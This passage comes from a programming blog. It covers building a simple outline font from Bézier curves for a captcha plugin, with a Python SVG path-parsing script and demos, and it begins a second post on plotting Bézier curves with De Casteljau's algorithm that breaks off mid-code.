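    print(sample(scale(arch, 2), 4))  # same shape, twice the size
```

<p>A bitmap font would need a separate pixel array for the bigger size, whereas here the same four points describe the glyph at any size.</p>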
<p>I will develop an outline font, but compared to
TrueType/OpenType/PostScript fonts, it will be in a very basic format
and not even include the full alphabet (just around 10-15 characters).
Furthermore, I will use quadratic and cubic Bézier splines. The glyphs
will have very simple shapes (each glyph will essentially be only a
path), but for some characters I will add some additional parameters to
illustrate the full range of possibilities. The final plugin, written in PHP,
will be able to save the captchas to PNG and BMP files, both of which are
bitmap formats.<br>
It would certainly be possible to use vector graphics directly
(such as Scalable Vector Graphics) and let the plugin just generate
them. As a layman, I think this would be considerably faster and a
<em>better</em> solution, since I could use the high-level language SVG and the
rasterization would happen on the client side and not on the
server as in my intended approach.</p>
<h3>Why is this faster?</h3>
<p>Because the most time-consuming step is the rasterization of the
Bézier splines and simple lines that define the individual glyphs
of the font. SVG files just describe the shape of these characters, while
the final drawing to the screen happens in the browser of the
client.<br>
On the other hand, I guess that .svg captchas are more easily
deciphered (OCR in short), because the cracker does not have to remove
noise and guess which part of the bitmap makes up the actual letters
(please leave a comment if you think differently).<br>
That being said, I will still go the other way (plotting my captcha
directly and producing bitmap pictures like PNGs), fully
aware that it might be the worse solution (heck, writing captcha
software in 2013 <em>is</em> certainly a bad idea). But all this is justified
by the fruitful learning process that accompanies the coding.</p>
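<p>For comparison, this is roughly what the SVG alternative could look like. It is only a sketch under my own assumptions: <code>svg_path_d</code> and <code>svg_document</code> are hypothetical helpers, and each segment is simply a list of one point (line), two points (quadratic Bézier) or three points (cubic Bézier). The server merely concatenates a string and the browser does all the rasterization:</p>

```python
# SVG path commands chosen by the number of points in a segment.
COMMANDS = {1: "L", 2: "Q", 3: "C"}


def svg_path_d(start, segments):
    """Build the 'd' attribute of a closed SVG path from absolute coordinates."""
    parts = ["M {},{}".format(*start)]
    for seg in segments:
        if len(seg) not in COMMANDS:
            raise ValueError("segment must have 1, 2 or 3 points")
        coords = " ".join("{},{}".format(x, y) for x, y in seg)
        parts.append("{} {}".format(COMMANDS[len(seg)], coords))
    parts.append("z")  # close the path
    return " ".join(parts)


def svg_document(d, width, height):
    """Wrap a path description in a minimal standalone SVG document."""
    return (
        '<svg xmlns="http://www.w3.org/2000/svg" width="{}" height="{}">'
        '<path d="{}" fill="none" stroke="black"/></svg>'
    ).format(width, height, d)


if __name__ == "__main__":
    # Hypothetical glyph: one straight line followed by one quadratic curve.
    d = svg_path_d((0, 0), [[(10, 0)], [(10, 10), (0, 10)]])
    print(svg_document(d, 20, 20))
```

<p>The flip side is visible right in the output: the path data contains the exact control points of every glyph, so an attacker gets the clean shapes for free.</p>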
<p>Now in case you shrug your shoulders when I mention Bézier curves,
consider reading my <a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">previous blog
article</a>, which
also includes a bunch of links to very nice resources. Be aware that
quite a bit of math hides behind Bézier splines and that I won't use
heavily optimized algorithms for plotting the splines, simply
because I don't have the mathematical/algorithmic knowledge and
skill to do so.</p>
<p>If I got you hooked and you also want to create your own fonts,
use them everywhere and save them in an official format
such as PostScript, SVG or TrueType/OpenType, consider the application
FontForge [Link goes here], which helps you quite a lot and spares you
the quirky low-level plotting algorithms. For my font, I just use
FontForge and Inkscape to get a feel for how my
glyphs should look, since it's kinda hard to think entirely in
points and control points of Bézier splines without actually drawing
them ;)</p>
<h3>Approach</h3>
<p>Because I needed some kind of sketch board to develop and design my
glyphs, I looked for a vector graphics application.
<a href="http://inkscape.org">Inkscape</a> fit perfectly and it generates
easily parsable .svg files. Then I created a little script that
exports the Bézier points and line points from the .svg files
generated by Inkscape. That wasn't too hard, since .svg is a W3C
standard and the <path> element is perfectly described
<a href="http://www.w3.org/TR/SVG/paths.html#Introduction">here</a>.</p>
<p>The export script I made looks like this (please note that only
closed paths consisting of cubic/quadratic Bézier curves and lines are properly parsed! If this
is not enough for your purpose, the script is easily extensible, though):</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Parses Inkscape SVG files and tries to obtain all Bézier curve points and lines.</span>
<span class="c1"># Assumes that only one glyph is drawn and extracts ALL Bézier points </span>
<span class="c1"># in the main layer (called 'layer1' in Inkscape). Only heterogeneous Bézier </span>
<span class="c1"># paths and straight lines are parsed correctly.</span>
<span class="c1"># Read: http://www.w3.org/TR/SVG/paths.html#Introduction</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Date: 14.10.2013</span>
<span class="c1"># Site: incolumitas.com</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="k">try</span><span class="p">:</span>
<span class="kn">from</span> <span class="nn">lxml</span> <span class="kn">import</span> <span class="n">etree</span>
<span class="k">except</span> <span class="ne">ImportError</span><span class="p">:</span>
<span class="n">sys</span><span class="o">.</span><span class="n">stderr</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'Ohh boy, it seems that you didn</span><span class="se">\'</span><span class="s1">t install lxml. Try "pip install lxml"</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">InvalidGlyphShape</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> This exception is raised when the parser discovers an element</span>
<span class="sd"> that it cannot read.</span>
<span class="sd"> '''</span>
<span class="c1"># lxml is awesome </span>
<span class="k">def</span> <span class="nf">parse_glyph</span><span class="p">(</span><span class="n">fname</span><span class="p">):</span>
<span class="k">for</span> <span class="n">event</span><span class="p">,</span> <span class="n">element</span> <span class="ow">in</span> <span class="n">etree</span><span class="o">.</span><span class="n">iterparse</span><span class="p">(</span><span class="n">fname</span><span class="p">,</span> <span class="n">tag</span><span class="o">=</span><span class="s1">'{*}g'</span><span class="p">):</span> <span class="c1"># "{*}" includes the whole xml namespace</span>
<span class="k">if</span> <span class="n">element</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="o">==</span> <span class="s1">'layer1'</span><span class="p">:</span> <span class="c1"># Inkscape packs all the shapes in a container and calls it "layer1" by default</span>
<span class="k">for</span> <span class="n">path</span> <span class="ow">in</span> <span class="n">element</span><span class="o">.</span><span class="n">iter</span><span class="p">(</span><span class="n">tag</span><span class="o">=</span><span class="s1">'{*}path'</span><span class="p">):</span> <span class="c1"># Find ALL(!) path elements</span>
<span class="k">yield</span> <span class="n">path</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'d'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">parse_path</span><span class="p">(</span><span class="n">fname</span><span class="p">):</span>
<span class="c1"># What format do we need? List of sequence of tuples</span>
<span class="c1"># like [[(43,233), (4434, 222), (87, 387)], [(63,23), (44, 12), (87, 337)], ...]</span>
<span class="c1"># each of them constituting points of a cubic Bézier spline.</span>
<span class="c1"># ... Analogous for the other shapes...</span>
<span class="k">for</span> <span class="n">d</span> <span class="ow">in</span> <span class="n">parse_glyph</span><span class="p">(</span><span class="n">fname</span><span class="p">):</span>
<span class="n">lines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">c_splines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">q_splines</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">d</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">' '</span><span class="p">)</span>
<span class="k">if</span> <span class="n">data</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'z'</span><span class="p">:</span>
<span class="k">raise</span> <span class="n">InvalidGlyphShape</span><span class="p">(</span><span class="s1">'Path is not a closed shape'</span><span class="p">)</span>
<span class="c1"># If a moveto is followed by multiple pairs of coordinates,</span>
<span class="c1"># the subsequent pairs are treated as implicit lineto commands.</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">if</span> <span class="n">cmd</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">(</span><span class="s1">'M'</span><span class="p">,</span> <span class="s1">'m'</span><span class="p">):</span>
<span class="k">raise</span> <span class="n">InvalidGlyphShape</span><span class="p">(</span><span class="s1">'No move command Mm'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span> <span class="c1"># Check for implicit lineto cmd.</span>
<span class="k">if</span> <span class="p">(</span><span class="ow">not</span> <span class="n">is_cmd</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">is_cmd</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">1</span><span class="p">])):</span>
<span class="n">lines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">:]),</span> <span class="mi">2</span><span class="p">)])</span> <span class="c1"># Lil hack here :)</span>
<span class="c1"># Magic parsing begins. Very basic parser.</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">e</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Cc'</span><span class="p">:</span>
<span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="n">c_splines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">4</span><span class="p">)])</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Qq'</span><span class="p">:</span>
<span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="n">q_splines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">3</span><span class="p">)])</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Ll'</span><span class="p">:</span>
<span class="n">data</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="n">lines</span><span class="o">.</span><span class="n">extend</span><span class="p">([</span><span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">chunks</span><span class="p">(</span><span class="n">sublist</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">2</span><span class="p">)])</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'Zz'</span> <span class="ow">and</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">:</span> <span class="c1"># closepath (close the current shape by drawing a line to the last moveto)</span>
<span class="c1"># With "closepath", the end of the final segment of the subpath is "joined"</span>
<span class="c1"># with the start of the initial segment of the subpath.</span>
<span class="n">lines</span><span class="o">.</span><span class="n">append</span><span class="p">([</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">]])</span>
<span class="n">cleaned</span> <span class="o">=</span> <span class="n">clean</span><span class="p">(</span><span class="n">cubic_bezier</span><span class="o">=</span><span class="n">c_splines</span><span class="p">,</span>
<span class="n">quadratic_bezier</span><span class="o">=</span><span class="n">q_splines</span><span class="p">,</span>
<span class="n">simple_lines</span><span class="o">=</span><span class="n">lines</span><span class="p">)</span>
<span class="k">yield</span> <span class="n">cleaned</span>
<span class="c1"># clean the data. For some reason my algorithm yields single points. Just</span>
<span class="c1"># remove them and the data is solid. </span>
<span class="k">def</span> <span class="nf">clean</span><span class="p">(</span><span class="o">**</span><span class="n">args</span><span class="p">):</span>
<span class="n">keys</span> <span class="o">=</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">keys</span><span class="p">())</span>
<span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
<span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]</span> <span class="o">=</span> <span class="p">[</span><span class="n">e</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">e</span><span class="p">)</span> <span class="o">></span> <span class="mi">1</span><span class="p">]</span>
<span class="c1"># Make integer coordinates ready to be rasterized. </span>
<span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
<span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]</span> <span class="o">=</span> <span class="p">[[</span><span class="nb">tuple</span><span class="p">([</span><span class="nb">int</span><span class="p">(</span><span class="nb">float</span><span class="p">(</span><span class="n">i</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">p</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)])</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">geo_el</span><span class="p">]</span> <span class="k">for</span> <span class="n">geo_el</span> <span class="ow">in</span> <span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">]]</span>
<span class="k">return</span> <span class="n">args</span>
<span class="c1"># print the glyph data.</span>
<span class="k">def</span> <span class="nf">pretty_print</span><span class="p">(</span><span class="n">args</span><span class="p">):</span>
<span class="n">keys</span> <span class="o">=</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">args</span><span class="o">.</span><span class="n">keys</span><span class="p">())</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'----------------------- Next data -------------------------'</span><span class="p">)</span>
<span class="k">for</span> <span class="n">kw</span> <span class="ow">in</span> <span class="n">keys</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="se">\n</span><span class="s1">***********</span><span class="se">\n</span><span class="s1">Point data for </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="n">kw</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="n">kw</span><span class="p">])</span>
<span class="c1"># Returns a sublist up to the next cmd.</span>
<span class="k">def</span> <span class="nf">sublist</span><span class="p">(</span><span class="n">l</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">e</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">l</span><span class="p">):</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'CcQqLlZz'</span><span class="p">:</span> <span class="c1"># SVG path commands</span>
<span class="k">return</span> <span class="n">l</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="n">i</span><span class="p">]</span>
<span class="c1"># Check if element is a command within d attribute in element.</span>
<span class="k">def</span> <span class="nf">is_cmd</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
<span class="k">if</span> <span class="n">e</span> <span class="ow">in</span> <span class="s1">'CcQqLlZzMm'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Make chunks </span>
<span class="k">def</span> <span class="nf">chunks</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">n</span><span class="p">):</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">l</span><span class="p">),</span> <span class="n">n</span><span class="o">-</span><span class="mi">1</span><span class="p">):</span>
<span class="k">yield</span> <span class="n">l</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span> <span class="o">+</span> <span class="n">n</span><span class="p">]</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="s1">'r'</span><span class="p">)</span> <span class="c1"># raises an exception if file can't be located</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">parse_path</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]):</span>
<span class="n">pretty_print</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">FileNotFoundError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[-] No such file, sir'</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">IndexError</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[-] Usage: </span><span class="si">%s</span><span class="s1"> SvgFile'</span> <span class="o">%</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
</code></pre></div>
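<p>A note on the <code>chunks()</code> helper: stepping by <code>n-1</code> instead of <code>n</code> makes consecutive windows share one point, which matches how every SVG segment starts where the previous one ended. It also seems to explain the single-point leftovers that <code>clean()</code> removes. The following is only a minimal sketch of that behaviour; the coordinate list is made up for illustration and not taken from a real glyph.</p>

```python
def chunks(points, n):
    """Yield windows of n points that overlap by one point (step n-1)."""
    for i in range(0, len(points), n - 1):
        yield points[i:i + n]

# Hypothetical point list: a start point followed by two cubic segments
# (three new points each), as the strings would appear in the 'd' attribute.
points = ['0,0', '1,2', '3,2', '4,0', '5,-2', '7,-2', '8,0']

raw = list(chunks(points, 4))

# The last window only holds the final end point. Dropping windows with a
# single element mirrors the filter in clean() from the script above.
segments = [s for s in raw if len(s) > 1]
print(segments)
```

<p>Each remaining window holds the four points of one cubic spline, and the last point of one window is the first point of the next.</p>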
<p>Now the font design can finally begin! I searched for inspiration at
Google Fonts and tried to redraw the glyphs freehand. This is of course
really unprofessional, because if you actually want to implement a
<em>real</em> font, you're better off using FontForge, a nice open source
program that incorporates many tools that help you create a
sophisticated font. I won't go down that path. Instead, I just
drew some cool glyphs according to my taste and, after a short
design period, imported them with the script listed above into my
Python font module, which was already equipped with the plotting
algorithms I discussed in the <a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">previous
article</a>. In
the aforementioned module, I am also going to store the glyph data
(implemented as a list of points).</p>
<p>Here are some screenshots to give you an impression of my
workflow.</p>
<p>First I roughly outline the shape of the glyph, and it looks like this: </p>
<p><img alt="raw-shaping a glyph" src="https://incolumitas.com/uploads/2013/10/unedited-1024x576.png"></p>
<p>Then after some reshaping: </p>
<p><img alt="fine-tuning the glyph" src="https://incolumitas.com/uploads/2013/10/better-1024x576.png"></p>
<p>And finally, after I exported it and redrew it using my own
module: <img alt="plotting with own implementation" src="https://incolumitas.com/uploads/2013/10/Drawing_myself-1024x576.png"></p>
<p>And to end this post, I present my final alphabet, all drawn on
a tkinter canvas with my own plotting algorithms. There are also
variants where skew and shear operations are applied to the alphabet.
Here are the screenshots:</p>
<p><img alt="All Glyphs" src="https://incolumitas.com/uploads/2013/10/all_glyphs-1024x576.png"></p>
<p>All the glyphs, scattered across the canvas. They are imported from the Inkscape
.svg files and plotted using the algorithms developed in the
<a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">last</a> blog
post.</p>
<p>And after applying some linear transformations:</p>
<p><img alt="Shear
transformation" src="https://incolumitas.com/uploads/2013/10/shear_applied-1024x576.png"></p>
<p>In this picture, all glyphs were moved using shear operations.</p>
<p><img alt="Skew transformation" src="https://incolumitas.com/uploads/2013/10/skew-1024x576.png">
Skew linear transformation.</p>
<p>My glyphs are far from beautiful or even consistent, but this isn't
really a drawback, since I will use them for my captcha plugin
(whose implementation in PHP will be presented in the next blog post).
The clear advantage is that all my glyphs (although they
don't really look like it) consist of simple lines and Bézier splines, which
means that we can express them as mathematical functions and therefore
apply a wide range of transformations to them without any loss of
information! After blurring the glyphs to our liking, we can finally
export them to a raster graphics format (such as PNG), at which point they
become immutable. Maybe I will add a way to fill the glyphs with color
in the PHP implementation in order to thwart pattern recognition
methods.<br>
As mentioned before, if you are interested in professional font/glyph
design, visit <a href="http://fontforge.org">fontforge.org</a> and read the great
resources over there.</p>
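<p>The "no loss of information" claim rests on a handy property of Bézier curves: transforming the control points with a linear map (such as a shear) and then evaluating the curve gives the same point as evaluating first and transforming afterwards. Here is a small sketch of that idea. The control points, the shear factor and the helper names <code>cubic_point</code> and <code>shear_x</code> are assumptions made up for this illustration; they are not part of the font module.</p>

```python
def cubic_point(t, p0, p1, p2, p3):
    """Evaluate a cubic Bézier curve at parameter t (Bernstein form)."""
    mt = 1 - t
    return tuple(
        mt**3 * a + 3 * mt**2 * t * b + 3 * mt * t**2 * c + t**3 * d
        for a, b, c, d in zip(p0, p1, p2, p3)
    )

def shear_x(point, k):
    """Horizontal shear: x' = x + k*y, y' = y."""
    x, y = point
    return (x + k * y, y)

control = [(0, 0), (10, 40), (50, 40), (60, 0)]  # hypothetical glyph segment
k = 0.5                                          # hypothetical shear factor

# Only the four control points are transformed, not the plotted pixels.
sheared_control = [shear_x(p, k) for p in control]

t = 0.3
via_control = cubic_point(t, *sheared_control)        # shear, then evaluate
via_curve = shear_x(cubic_point(t, *control), k)      # evaluate, then shear
print(via_control, via_curve)
```

<p>Both results agree up to floating point rounding, so a glyph can be sheared, skewed or scaled by touching only its handful of control points and rasterized afterwards.</p>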
<p>And that's the end! Stay tuned for the final article of my series, which
will talk about the captcha plugin!</p>
<h3>Links</h3>
<ul>
<li><a href="https://github.com/NikolaiT/CunningCaptcha">The github repository that contains all of the above code
snippets</a></li>
<li><a href="http://fontforge.org">The fontforge home page</a></li>
<li><a href="http://inkscape.org/">The great vector drawing program Inkscape</a></li>
<li><a href="http://pomax.github.io/bezierinfo/">A wonderful insight into the applications of Bézier curves. Really
high quality stuff!</a></li>
<li><a href="http://en.wikipedia.org/wiki/Transformation_matrix">All possible ways to move/rotate/shear
points</a></li>
<li><a href="http://en.wikipedia.org/wiki/Computer_font">Computer Fonts</a></li>
<li><a href="http://en.wikipedia.org/wiki/Bresenham's_line_algorithm">Rastering
lines</a></li>
<li><a href="http://en.wikipedia.org/wiki/B%C3%A9zier_curve">Wikipedia about Bézier
curves</a></li>
<li><a href="http://en.wikipedia.org/wiki/Scalable_Vector_Graphics">SVG w3
standard</a></li>
</ul>Plotting Bézier curves directly and with De Casteljau's algorithm2013-10-06T23:23:00+02:002013-10-06T23:23:00+02:00Nikolai Tschachertag:incolumitas.com,2013-10-06:/2013/10/06/plotting-bezier-curves/<p><em>Last major Update: 21.10.2013</em> </p>
<p><a href="https://github.com/NikolaiT/CunningCaptcha/tree/master/python_tests">Github repo that contains the presented code in this
post.</a></p>
<h3>Introduction</h3>
<p>In this article I present a very simple and in no sense
optimized algorithm written in Python 3 that plots quadratic and cubic
Bézier curves. I'll implement several variants of Bézier rasterization
algorithms. Let's call the first version the direct approach, since it
computes the corresponding x and y coordinates directly by evaluating
the equation that describes such Bézier curves. </p>
<p>The other possibility is De Casteljau's algorithm, a recursive
implementation. The general principle is illustrated
<a href="http://en.wikipedia.org/wiki/De_Casteljau's_algorithm#Geometric_interpretation">here</a>.
But to summarize the idea very briefly: In order to compute the points
of the Bézier curve, you subdivide the lines of the outer hull that are
given by the n+1 control points (where n denotes the degree of the
Bézier curve) at a ratio t (t goes from 0 to 1 in a loop). If you
connect the interpolation points, you'll obtain n-1 connected lines.
Then you apply exactly the same principle to these newly obtained lines
(recursive step), until only one line remains.
Take the point at the ratio t on this last line and
BOOM, you've got your point on the Bézier curve for your specific t value.
Increase t and continue this process until you have plotted the curve
(the image below is the graphic equivalent of this description. I don't own the image;
the source is http://wiki.ece.cmu.edu).<br>
<img alt="Casteljau
Principle" src="http://wiki.ece.cmu.edu/ddl/images/DeCasteljau2.png"><br>
In this article, I'll supply source code snippets for both algorithms
mentioned above and will add a simple performance test to compare them.
Additionally, I am going to polish the direct approach for performance
and will describe some recipes I learned from other blogs to increase the
efficiency of the plotting algorithm.</p>
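<p>To make the recursive idea concrete before diving into the details, here is a bare-bones sketch of De Casteljau's algorithm on plain tuples. It is only an illustration under my own assumptions: the helper names <code>lerp</code> and <code>de_casteljau</code> and the control points are hypothetical, and nothing is drawn on a canvas.</p>

```python
def lerp(p, q, t):
    """Point at ratio t on the line from p to q."""
    return tuple((1 - t) * a + t * b for a, b in zip(p, q))

def de_casteljau(points, t):
    """Recursively shrink the control polygon until one point is left."""
    if len(points) == 1:
        return points[0]
    # Every pair of neighbouring points yields one interpolated point,
    # so each round has one point (and one line) fewer than the last.
    reduced = [lerp(p, q, t) for p, q in zip(points, points[1:])]
    return de_casteljau(reduced, t)

control = [(0, 0), (10, 40), (50, 40), (60, 0)]  # hypothetical cubic curve
steps = 10                                       # coarse on purpose
curve = [de_casteljau(control, i / steps) for i in range(steps + 1)]
print(curve[0], curve[-1])
```

<p>The first and last computed points coincide with the first and last control point, which is a quick sanity check for any Bézier plotter. The same function works unchanged for quadratic curves, since it only depends on the number of points passed in.</p>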
<h3>Background. Splines, What for?</h3>
<p>But why do I even need such geometrical primitives? I am currently
working on my captcha WordPress plugin, which builds the captcha from
the ground up and therefore needs some mechanism to rasterize
geometrical figures such as characters (yes, for once I am talking about
<em>those</em>, not the data type ^^). Thus I need three different shapes:
simple lines, circles (or more generally ellipses) and lastly Bézier
curves. I could compose rudimentary characters just with lines and
circles, but we do have some ambition over here, don't we? :)</p>
<p>This means that I will essentially define a new, but very primitive
font. I guess that my font will contain around 10 to 15 glyphs and it
will use a mezcla (mix) of bitmap and outline font techniques. If you
want to know more about them, just <a href="http://en.wikipedia.org/wiki/Computer_font#Font_types">read
up on them</a>.
I am also going to publish a separate blog post about this font project
in the near future, so stay tuned (<strong>Edit:</strong> <a href="http://incolumitas.com/2013/10/16/create-your-own-font-the-hard-way/">The future has
arrived</a>).
I am really excited about how ugly and cruel this font is going to be
(actually that's even an advantage for CAPTCHAs).</p>
<p>If you are further interested in the technical background knowledge and
mathematical properties of Bézier splines, consider reading the
<a href="http://en.wikipedia.org/wiki/B%C3%A9zier_curve">Wikipedia article</a> or
<a href="http://pomax.github.io/bezierinfo/">this wonderful tutorial</a> and then
there's also <a href="http://www.scratchapixel.com/lessons/3d-basic-lessons/lesson-11-rendering-the-teapot-bezier-surfaces/">this nice
introduction</a>.
The authors of those articles explain the concepts way better than a
layman like me ever could. Here, I just present some simple code snippets
to get started and whet the appetite, as well as a discussion of
performance issues.</p>
<p>Finally we get to see some actual code. This Python script essentially
draws quadratic and cubic Bézier curves. That's the direct approach as
stated above. Note that the code is still horribly unoptimized.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">tkinter</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="k">class</span> <span class="nc">Bezier</span><span class="p">(</span><span class="n">tkinter</span><span class="o">.</span><span class="n">Canvas</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Simple and slow algorithm to draw quadratic and </span>
<span class="sd"> cubic Bézier curves. Heavily inspired by http://pomax.github.io/bezierinfo/#control</span>
<span class="sd"> This code should just prove a concept and is not intended to be </span>
<span class="sd"> used in a real world app...</span>
<span class="sd"> Author: Nikolai Tschacher</span>
<span class="sd"> Date: 07.10.2013</span>
<span class="sd"> '''</span>
<span class="c1"># Because Canvas doesn't support simple pixel plotting,</span>
<span class="c1"># we need to help us out with a line with length 1 in</span>
<span class="c1"># positive x direction.</span>
<span class="k">def</span> <span class="nf">plot_pixel</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">create_line</span><span class="p">(</span><span class="n">x0</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">x0</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">y0</span><span class="p">)</span>
<span class="c1"># Calculates the quadratic Bézier polynomial for </span>
<span class="c1"># the n+1=3 coordinates.</span>
<span class="k">def</span> <span class="nf">quadratic_bezier_sum</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">t</span><span class="p">,</span> <span class="n">w</span><span class="p">):</span>
<span class="n">t2</span> <span class="o">=</span> <span class="n">t</span> <span class="o">*</span> <span class="n">t</span>
<span class="n">mt</span> <span class="o">=</span> <span class="mi">1</span><span class="o">-</span><span class="n">t</span>
<span class="n">mt2</span> <span class="o">=</span> <span class="n">mt</span> <span class="o">*</span> <span class="n">mt</span>
